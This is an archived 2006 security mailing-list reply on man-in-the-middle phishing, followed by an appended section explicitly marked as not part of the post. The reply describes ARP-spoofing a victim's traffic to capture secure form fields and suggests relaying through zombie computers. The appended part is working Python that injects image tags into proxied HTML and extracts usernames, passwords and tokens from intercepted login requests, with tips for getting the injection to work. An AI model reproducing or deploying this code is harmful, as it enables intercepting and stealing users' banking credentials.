WebApp Sec mailing list archives

Re: Mitm new?


From: Rogan Dawes <discard () dawes za net>
Date: Thu, 17 Aug 2006 10:32:34 +0200

Jeff Robertson wrote:
> Why are man-in-the-middle phishing sites suddenly talked about as a
> "new" threat, as if there was rocket science involved?
>
> For instance
> http://blog.washingtonpost.com/securityfix/2006/07/citibank_phish_spoofs_2factor_1.html
>
> These things are basically proxies, which are as old as the web. Why
> does it surprise anyone to see these combined with phishing? (Then
> again, I still haven't figured out why phishing as we know it didn't
> "take off" circa 1994)
>
> Jeff Robertson

Yeah, there is nothing special about this.

At the time of the IE HTTPS certificate attack (http://security.e-matters.de/advisories/012001.html), I used a transparent (ARP-spoofing) MITM proxy to insert image requests for an SSL page from the target into non-SSL pages that passed through my proxy. After that, any subsequent requests for the targeted secure pages (even via bookmark, etc.) passed through my proxy, and I could record, alter, etc. any fields that I wanted to.

I guess one of the deterrents to using this technique is that the source of all the connections would appear to come from a single IP. Of course, it would not be too difficult to relay the connections via one or more zombie computers, exactly as they do currently to harvest credentials. This could introduce a lot of latency, which a user MIGHT notice.

Rogan
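The two pieces of proxy logic Rogan describes, written out as an added example that is not part of his post or of any tool mentioned in the thread: rewriting a plain-HTTP HTML response that transits the proxy so that it carries an <img> reference to an HTTPS resource on the target, and then pulling the interesting fields out of the login POST that later flows through the same proxy. The hostname, image URL, field names and both HTTP messages are constructed for this example; the socket-level transparent proxy (ARP spoofing, TLS termination) that would feed these functions is assumed and not shown.

```python
"""
Added example, not code from the post: response rewriting and form-field
capture for a transparent MITM HTTP proxy. All hostnames, URLs, field
names and sample messages below are constructed for illustration.
"""
from urllib.parse import parse_qs

# Hypothetical HTTPS resource on the target that the victim's browser
# should be made to fetch through the proxy (constructed for the example).
TARGET_IMAGE_URL = "https://login.example-bank.test/images/spacer.gif"


def split_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, headers, body).
    Header names are lower-cased str keys; raises if the head is incomplete."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0], headers, body


def inject_image_tag(raw: bytes, image_url: str = TARGET_IMAGE_URL) -> bytes:
    """Insert a 1x1 <img> pointing at image_url into a 200 text/html body.

    Anything else (redirects, images, gzip- or chunk-encoded bodies that
    would need decoding first) is returned untouched. Content-Length is
    recomputed so the client does not stall waiting for missing bytes."""
    status, headers, body = split_response(raw)
    parts = status.split()
    if len(parts) < 2 or parts[1] != b"200":
        return raw
    if not headers.get("content-type", "").lower().startswith("text/html"):
        return raw
    if "content-encoding" in headers or headers.get("transfer-encoding", "").lower() == "chunked":
        return raw
    tag = ('<img src="%s" width="1" height="1" alt="">' % image_url).encode("ascii")
    # Land just before </body> so the page still renders; else append.
    idx = body.lower().rfind(b"</body>")
    new_body = (body[:idx] + tag + body[idx:]) if idx != -1 else (body + tag)
    head = raw.split(b"\r\n\r\n", 1)[0]
    out_lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode("ascii")
        out_lines.append(line)
    return b"\r\n".join(out_lines) + b"\r\n\r\n" + new_body


def capture_form_fields(raw_request: bytes, wanted=("userid", "password", "token")):
    """Return the wanted fields from a captured urlencoded POST as a dict.

    This is the point at which the proxy would log the values (or change
    them) before forwarding the request to the real site. Non-POST
    requests yield an empty dict."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP request")
    method = head.split(b"\r\n")[0].split()[0]
    if method != b"POST":
        return {}
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {name: fields[name][0] for name in wanted if name in fields}


# Constructed samples: a plain-HTTP page passing through the proxy, and
# the later login POST, seen in clear text because the proxy terminates
# the victim's SSL session.
PLAIN_PAGE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Content-Length: 46\r\n"
    b"\r\n"
    b"<html><body><p>Weather today</p></body></html>"
)

LOGIN_POST = (
    b"POST /cgi-bin/login HTTP/1.1\r\n"
    b"Host: login.example-bank.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 41\r\n"
    b"\r\n"
    b"userid=jdoe&password=hunter2&token=482913"
)

if __name__ == "__main__":
    print(inject_image_tag(PLAIN_PAGE).decode("latin-1"))
    print(capture_form_fields(LOGIN_POST))
```

Rewriting only uncompressed, non-chunked HTML is the practical boundary: a real proxy would either strip Accept-Encoding from the client's request so the server replies uncompressed, or decode the body before editing it, otherwise the injected tag corrupts the stream and the browser shows nothing.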
